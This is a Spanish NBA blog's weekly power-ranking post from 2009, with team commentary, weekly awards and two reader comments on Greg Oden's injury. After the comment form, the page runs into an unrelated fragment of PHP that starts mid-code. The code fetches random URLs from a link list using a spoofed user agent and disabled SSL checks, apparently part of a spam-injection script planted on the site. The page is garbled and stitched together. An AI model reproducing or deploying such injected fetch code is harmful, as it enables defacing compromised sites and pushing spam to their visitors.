Informe semanal #6

07 de December de 2009 por TheDeerHunter

¿Porqué todos los jugones sonríen igual?

Es fácil sonreir cuando juegas en los actuales Lakers, Celtics, Magic o Cavs. Ya  intuíamos todos desde el principio la diferencia que podía haber con respecto al nivel medio del resto de los equipos y más si les nace la flor…

Menos favoritos lo eran Nuggets. Si logran mantener este impresionante ritmo ofensivo así como el nivel colectivo no quedará más remedio que rendirnos a la evidencia de que son alternativa.

Ganarás el pan con el sudor de tu frente.

D’Antoni ha sacado la tijera de podar y los resultados le dan un respiro. No todas las semanas  ganará a sus ex Suns, ganará en Atlanta y le plantará cara a los Magic. El caso es que con lo mal que lo estaban haciendo no están tan lejos de la 8ª plaza del Este.

Y es que la 8ª la ha alcanzado Toronto. Un día les cae un palizón de 146 puntos y los siguientes ganan en Washington y en Chicago. ¿No es maravilloso vivir en el Este?

Hawks y Heat, con la “exigente” presión a la que les someten sus perseguidores son los que más razones tienen para mirar el futuro con optimismo.

En el Oeste, la vida puede ser maravillosa si CP3 vuelve a vestirse de corto.

Por otro lado, las cosas se ponen feas en Portland. Drama de lesiones y el Oeste está que arde. Sus rivales, sudando a chorros por cada victoria, “medianías” como los Mavs, Suns, Jazz o Spurs… ahí es nada.

En este filo de la navaja están acostumbrado a vivir los Rockets, pero es que ahora se suben a las barbas los Kings, Thunder, Grizzlies y Clippers. La madre de todas las guerras.

En el Este, los Pistons son de los pocos que han logrado sacar un mínimo de rendimiento a sus sudores.

Se dejaban llevar.

Lograron hacer buena la defensa de Toronto. Es increíble que los Bulls sólo acertaran a anotar 78 puntos anoche y no han llegado a 100 en ninguno de sus partidos esta semana.

Los Wizards una de cal y otra de “Arenas” y, aunque es difícil imaginar un equipo de Larry Brown dejándose llevar, estrenando a los Nets, no podemos colocar a los Bobcats en otro lugar nada más que en este.

Finalmente los Warriors son el equipo “se dejan llevar” por antonomasia.

The Carabasas Club.

Noticia que ni los Nets ni los Wolves se lleven la cuchara de madera esta semana.

Pacers y Sixers se llevan el premio a los paquetones de la semana. No ha mejorado mucho el panorama con la vuelta de Dunleavy, veremos si lo hace con la del señor Allen.

PREMIOS SEMANALES TJNBA:


¿Qué has hecho tú que no hayamos hecho los demás??

Ahí ahí han estado Melo y Kobe, pero es que canastones como el que metió el otro día “La Mamba” contra los Heat, somos pocos en este planeta los que estamos capacitados para meterlos.

Al salir de clase.

Los resultados no han acompañado, pero Tyreke Evans ha rendido casi al nivel de los dos MVPs y, con el sutil bajón de Jennings pone la carrera por el RoY al rojo vivo.

La vida puede ser maravillosa.

La sorpresa positiva de la semana no puede ser otra que la primera victoria de los Nets, con actuación de Brook López de 31 ptos, 14 rebotes.

Ahora, que el chaval lleva de media 23-10 en los últimos 5 y tampoco es que les haya servido de demasiado.

Cortocircuitos S.L.

Auténtica mala suerte. Todos estamos bastante conmocionados ante la nueva lesión de Oden.

Muchos ánimos para él y para los muchos aficionados de los Blazers que nos seguís.

Comenta

2 comentarios a esta entrada

  1. M dice:
    #1

    Pobre Oden…ya no es sólo la fragilidad que va a tener siempre (que es lo más grave), es que con tanta persistencia y tanta gravedad, las posibilidades de irse haciendo un jugador más hecho se van por la borda con tanta lesión. Es un jugador aún verde, con partidos hubiera sido un gran dominador e las zonas, supongo. En fin, mala suerte para él y su equipo. Espero equivocarme, pero… . Aunque bueno, siempre nos quedará ese Nate, por el que aposté como entrenador del año…me voy a dar unas collejas, ahora vuelvo.

      Citar

  2. NBA LAKERS BLOG dice:
    #2

    Sin dudas es una lastima lo de Oden… esta lesión ya peligra su carrera, no su temporada, que por cierto ya está acabada… Muy bien expresado lo de los Knicks, y ese premio tenía que ir para el triplazo de Kobe Bean Bryant!

    Excelente el blog, como siempre lo digo aquí 😉

    Te espero en nuestro blog de los Lakers!

    Un abrazo!

    –NM–

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>